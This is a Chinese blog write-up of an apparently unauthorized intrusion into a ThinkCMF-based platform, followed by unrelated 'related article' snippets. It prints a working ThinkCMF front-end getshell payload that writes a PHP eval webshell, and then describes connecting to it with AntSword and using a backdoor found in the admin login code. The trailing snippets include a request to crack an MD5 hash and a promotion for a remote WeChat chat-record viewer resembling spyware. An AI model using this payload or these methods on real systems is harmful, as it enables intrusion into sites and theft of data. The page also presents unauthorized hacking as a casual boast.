渗透小计之「竟然有人在wangle平台代码里下毒」

访客3年前黑客工具733

print by 猩猩安全团队——作者:hurnme、flyingdemon

引言

记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程

确定目标CMS

拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。

进去之后在url处构造报错

写入一句话

查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" ***  *** 521"]);?>')</php>

写入shell之后连接蚁剑,直接拿下

鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!

进入♂后台

一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。

正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。

这。。。这TM。。。有人在代码里下毒。

拿着不知道是哪位好心人留下的后门,含泪登录了后台。

帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。


相关文章

淘宝优惠券微信群名(优惠购物微信群名大全)

很多人说做优惠券是非常简单和低门槛的一个工作,无非就是拉一个微信群,然后每天发一些淘宝的优惠券产品。 可是真的如此吗? 之前有朋友说,我老婆在家里没什么事干,你们开淘宝店铺只要有一台电脑就可以了吧...

笔记本怎么清理灰尘(清灰教程)

笔记本怎么清理灰尘(清灰教程) 大家好,今天分享一篇来源小白一键重装网(www.xiaobaixitong.com)关于解答:笔记百思特网本电脑清灰教程。 万年不百思特网清灰的笔记本电脑会成什么样...

MD5 密码请高手破解 谢谢

  668375a988bc763134639b4c8c2f92a4   这个MD5密码谁能帮我破解一下 我找了很多在线破解的站点 都破解不了 用软件速度太慢 破解两天了 还没出来结果 希望高手能帮忙...

黑客帝国矩阵重启为什么评分低(黑客帝国矩阵重启)

黑客帝国矩阵重启为什么评分低(黑客帝国矩阵重启)

本文导读目录: 1、关于黑客帝国系列电影的一些疑问 2、看完《黑客帝国 矩阵化》动漫版,但是结局还是不明白,最后简介所说的无法控制是什么意思 3、《黑客帝国:矩阵重生》将上映,时隔 20 年你...

割草散发青草的气味是怎么来的?蚂蚁庄园5月21日答案

割草散发青草的气味是怎么来的?蚂蚁庄园5月21日答案

割草散发青草的气味是怎么来的?支付宝蚂蚁庄园小课堂5月21日今日题目答案!相信很多玩家都不知道这个答案,答对就可以领取到180g小鸡饲料。以上是支付宝蚂蚁庄园小课堂2020年5月21日的题目,那么你们...

远程微信聊天记录查看器(下载app远程监控)

远程控制微信聊天纪录查看器(下载应用实时监控)微信聊天纪录如何查询?微信聊天纪录查看器如何使用?微信聊天纪录根据深层扫描仪导出来修复到手机上,看起来一个繁杂的修复实际操作,根据数据修复手机软件的协助,...